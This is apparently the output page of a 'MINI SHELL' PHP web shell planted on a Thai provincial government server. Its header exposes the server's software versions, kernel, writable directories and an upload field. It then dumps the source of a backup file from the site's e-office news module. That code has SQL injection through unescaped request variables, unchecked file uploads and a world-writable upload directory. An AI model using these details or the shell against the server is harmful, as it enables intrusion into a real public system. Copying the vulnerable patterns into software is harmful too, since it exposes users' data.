MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/gov_news/bk/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/application/gov_news/bk/Copy of showcat.php
<?
session_start();
ob_start();
include("../../config/config.inc.php");
include("../../common/function.php");

function  randigit($numchar){
	$frchar = array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z") ; 
	$ran_digit ="";
	for ($ii = 0 ;   $ii < $numchar ;   $ii++ ){ 
		$ran_digit .= $frchar[rand(1,26)] ; 
	}
	return $ran_digit ; 
} ## END function 

// query for intializing...
$sql1 = "SELECT * FROM kpi_detail WHERE id='$cat_id'";
$query1 = mysql_query($sql1) or die(mysql_error());
$nrows = mysql_num_rows($query1);
if ($_POST) {
	$file1 = $_POST['subject_source'];
	$sql = "INSERT INTO kpi_detail(id,title,detail) VALUES ('$cat_id','$title','$detail')";
	$sdetail ="detail".$sub_id;
	if ($nrows) { if ($sub_id) { $sql = "UPDATE kpi_detail SET title='$title',detail='".$_POST[$sdetail]."' WHERE id='$cat_id' AND sub_id='$sub_id'"; } }
	
	// count for file upload
	for($i=0;$i<count($file1);$i++){	
	if (!empty($file1[$i])){ 
		#----------------------------------------------------------------------------------- find file extension 
		$today = date("ymd");
		$arrfileext = explode("." , $file1_name[$i]) ; 
		$nmcount = count($arrfileext) - 1 ; 
		$file1ext = $arrfileext[$nmcount]  ;
		$server_filename = $today.randigit(5).".$file1ext" ;
		$save_path =  "../../upload/govnews/". $server_filename   ; 
		$save_dir =  "../../upload/govnews/"; 	
		if (!( is_dir($save_dir) )){ Rmkdir($save_dir);  }  ######## สร้าง folder ตามบัตรประชาชน ในกรณีที่ยังไม่มีไม่มี  
		if (copy( $file1[$i] , $save_path )){
			if(PHP_OS=='Linux'){  chmod("$path/".$save_dir, 0777);  }
			if (!$sub_id) {
				$s = "SELECT * FROM ";
			}
			if($num_ch > 0){// ตรวจสอบกรณีเอกสารประกอบมีอยู่แล้ว
			@unlink($unlink_filename);// ลบไฟล์เก่าก่อนแก้ไข
				$sqlins = " UPDATE e_attach_file SET file_req='$server_filename'  WHERE ref_id='$eserviceid' AND ed_id='$key_doc[$i]'" ; 	
			}else{
			$sqlins = " INSERT INTO  kpi_detail_file  ( `id`,`filename`,`detail`) VALUES ('$cat_id','$server_filename','$img_type','$key_doc[$i]')  " ; 			
			}
			#echo $sqlins;
			 $result = mysql_db_query($dbname , $sqlins) ;
			if (mysql_errno() != 0){ echo "<hr> Line".__LINE__. "   ข้อความระบบ :: ".mysql_error()  ."<br><br> "; } 
		/*		echo "  <script language=\"JavaScript\">  alert(\"   บันทึกเสร็จสิ้น   \") ; </script> ";*/
		}else{
			print "<br><br><center> " . filesize($file1)  . "ไม่สามารถอัฟโหลดไฟล์ได้ เนื่องจากไม่มีการเลือกไฟล์  <br><br>";
			print "";
			print "<center> <a href='#' onclick='history.go(-1)'>ย้อนกลับ</a> <center><HR>";
			print("Local File: $file1 <BR>\n");
			print("Name: $file1_name <BR>\n");
			print("Size: $file1_size <BR>\n");
			print("Type: $file1_type <BR>\n");
			print("<HR>");
		}
			
	}  ######## if ($file1[$i] != ""){ 
}// end for($i=0;$i<count($file1);$i++){	
	$query = mysql_query($sql) or die(mysql_error());
	header("Location: $PHP_SELF?cat_id=$cat_id");
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>พรบ. ข้อมูลข่าวสาร</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../../common/style.css" type="text/css" rel="stylesheet">
<style type="text/css">
<!--
body {
	margin-left: 4px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
</style>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="../../common/fckeditor/fckeditor.js"></script>
<script type="text/javascript">
function funcClone() {
	$("#newNode").slideDown();
	$("#clickTable").toggle();
}
</script>
<script type="text/javascript"><!--
var gFiles = 0;
function addFile() {
	var subS = "แหล่งเงิน";
	var budgetS = "จำนวนเงิน";
	var li = document.createElement('li');
	li.setAttribute('id', 'file-' + gFiles);
	li.innerHTML = 'ชื่อไฟล์ : <input type="file" name="subject_source[]" size="30"><br/>รายละเอียด : <input type="text" name="subject_text[]" size="27"><span onclick="removeFile(\'file-' + gFiles + '\')" style="cursor:pointer;"> <img src=../../images/profile_expanded.gif border=0></span>';
	document.getElementById('files-root').appendChild(li);
	gFiles++;
}

function removeFile(aId){
	var obj = document.getElementById(aId);
	obj.parentNode.removeChild(obj);
}
-->
</script>
</head>

<body bgcolor="#A3B2CC">
<? if($nrows) { while($rs = mysql_fetch_assoc($query1)) { /* start while */ ?>
<br>
<form name="form<?=$cat_id;?><?=$rs[sub_id];?>" method="post" action="<?=$PHP_SELF;?>?cat_id=<?=$cat_id;?>&sub_id=<?=$rs[sub_id];?>">
  <table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000">
    <tr>
      <td><table width="100%" border="0" align="center" cellpadding="2" cellspacing="1">
          <tr>
            <th colspan="2" align="left" bgcolor="#AEBCD2">รายละเอียด</th>
          </tr>
          <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">หัวข้อ : </td>
            <td width="80%" align="center" valign="top" bgcolor="#F3F5F8">
				<input name="title" type="text" id="title" style="width:98%;" value="<?=$rs[title];?>">			</td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">รายละเอียด : </td>
            <td valign="top" bgcolor="#F3F5F8">
				<script type="text/javascript">
					var sBasePath = '../../common/fckeditor/';
					var oFCKeditor<?=$rs[sub_id];?> = new FCKeditor( 'detail<?=$rs[sub_id];?>' ) ;
					oFCKeditor<?=$rs[sub_id];?>.BasePath	= sBasePath ;
					oFCKeditor<?=$rs[sub_id];?>.ToolbarSet = 'Basic' ;
					oFCKeditor<?=$rs[sub_id];?>.Value = '<?=eregi_replace("\n","",eregi_replace(chr(13),"",$rs[detail]));?>' ;
					oFCKeditor<?=$rs[sub_id];?>.Create();
				</script>			 </td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">แนบไฟล์ :  </td>
            <td align="left" valign="top" bgcolor="#F3F5F8">
			<span style="cursor:pointer;" onClick="addFile()">เพิ่มไฟล์ <img src="../../images/profile_collapsed.gif" border="0"></span>
	<ul id="files-root">
	 <? if(($action != "edit")){ ?>
		<li>ชื่อไฟล์ : <input type="file" name="subject_source[]" size="30"><br/>รายละเอียด : <input type="text" name="subject_text[]" size="27"></li>
	  <? } ?>
	  <?
/*  if(($action == "edit")){
	$strSQL_e = "SELECT * FROM sml_budget  WHERE epm_id='$epm_id' and type_budget='5' ";
	$Result_e = mysql_query($strSQL_e);
	$nn=0;
	while($Rse = mysql_fetch_assoc($Result_e)){
			echo "<li id='file-".$nn."'>
<input type=\"text\" name=\"subject_sEdit[$nn]\" size=\"50\" value='$Rse[text_budget]'>&nbsp;&nbsp;&nbsp;จำนวนเงิน<input name=\"budget_sEdit[]\" type=\"text\" size=\"10\" value='$Rse[budget_list]'> <span onclick=\"removeFile('file-".$nn."')\" style=\"cursor:hand;\"><img src=../images/profile_expanded.gif border=0></span><br>";
		echo "<input type='hidden' name='runid_e[$nn]' value='$Rse[runid]'></li>";
		$nn++;
		}
	}*/
	  ?>  
	</ul>			</td>
          </tr>
          <tr>
            <td colspan="2" align="center" valign="top" bgcolor="#F3F5F8"><input name="Submit2" type="submit" class="epm_button" value="จัดเก็บข้อมูล"></td>
          </tr>
      </table></td>
    </tr>
  </table>
</form>
<br/>
<? } ?>
<table width="100%" border="0" id="clickTable">
  <tr>
    <td height="18" align="left" valign="middle"><a href="javascript:;" onClick="return funcClone();"><img src="../../images_sys/nolines_plus.gif" alt="+" width="18" height="18" border="0" align="middle">เพิ่มหัวข้อใหม่</a></td>
  </tr>
</table>
<div id="newNode" style="display:none;">
<? } else { ?><div id="newNode"><? } ?>
<form name="formx" method="post" action="<?=$PHP_SELF;?>?cat_id=<?=$cat_id;?>">
  <table width="95%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000">
    <tr>
      <td><table width="100%" border="0" align="center" cellpadding="2" cellspacing="1">
          <tr>
            <th colspan="2" align="left" bgcolor="#AEBCD2">รายละเอียด</th>
          </tr>
          <tr>
            <td width="20%" align="right" valign="top" bgcolor="#F3F5F8">หัวข้อ : </td>
            <td width="80%" align="center" valign="top" bgcolor="#F3F5F8">
				<input name="title" type="text" id="title" style="width:98%;" value="">			</td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">รายละเอียด : </td>
            <td valign="top" bgcolor="#F3F5F8">
				<script type="text/javascript">
					var sBasePath = '../../common/fckeditor/';
					var oFCKeditor = new FCKeditor( 'detail' ) ;
					oFCKeditor.BasePath	= sBasePath ;
					oFCKeditor.ToolbarSet = 'Basic' ;
					oFCKeditor.Value = '' ;
					oFCKeditor.Create() ;
				</script>		    </td>
          </tr>
          <tr>
            <td align="right" valign="top" bgcolor="#F3F5F8">แนบไฟล์ :  </td>
            <td align="left" valign="top" bgcolor="#F3F5F8"><input type="file" name="filename"></td>
          </tr>
          <tr>
            <td colspan="2" align="center" valign="top" bgcolor="#F3F5F8"><input name="Submit" type="submit" class="epm_button" value="จัดเก็บข้อมูล"></td>
          </tr>
      </table></td>
    </tr>
  </table>
</form>
<br/>
</div>
</body>

</html>

Anon7 - 2021